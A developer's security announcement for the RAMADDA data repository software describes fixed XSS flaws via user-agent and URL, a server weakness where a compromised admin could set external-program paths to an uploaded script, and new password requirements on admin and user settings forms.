changes to admin and user settings

[Jeff McWhirter]

Hi RAMADDA users,

Last week someone notified me of a couple of Cross Site Scripting (XSS) vulnerabilities. The major one was adding a XSS exploit to the user-agent on a request. This would then show up in the RAMADDA logs and, if viewed via the web interface, would evaluate the XSS exploit. The other one involved a malformed URL that contained the XSS exploit. This person also did a very deep dive into the RAMADDA source and identified some other server exploits that could be taken advantage of if an admin account got compromised.

I have fixed the XSS vulnerabilities as well as the underlying potential server exploits (see below for more details)

As an added layer of security I have also made a change to the user settings, admin settings and admin->new user forms. These now, by default, require a password. With the latest release you should see something like the below for the user password/admin/etc forms-

This behavior can be turned off if desired (but not recommended) with a property setting-

https://ramadda.org/repository/userguide/installing.html#dopassword

I have made new release of RAMADDA at -

https://ramadda.org/release

-Jeff

As to the server exploit - basically, RAMADDA provides a service integration framework that can call out to external programs on the server to do something (eg., running gs to extract a thumbnail image from a PDF file). These program paths are set by RAMADDA properties which can be set both through .properties files on the server as well as through properties in the Admin->Settings web interface. So, if a bad actor could take over an admin account they could set a property (e.g., the gs path) to a shell script that they uploaded through RAMADDA as a regular file entry. This is fixed now by only using the paths defined in the external server based properties files. Also, the password requirement described above would also block a bad actor from changing Admin settings.

If you had configured your RAMADDA to make use of external programs via the Admin->Extra Properties form you should move those properties settings to a .properties file in your server's RAMADDA home directory.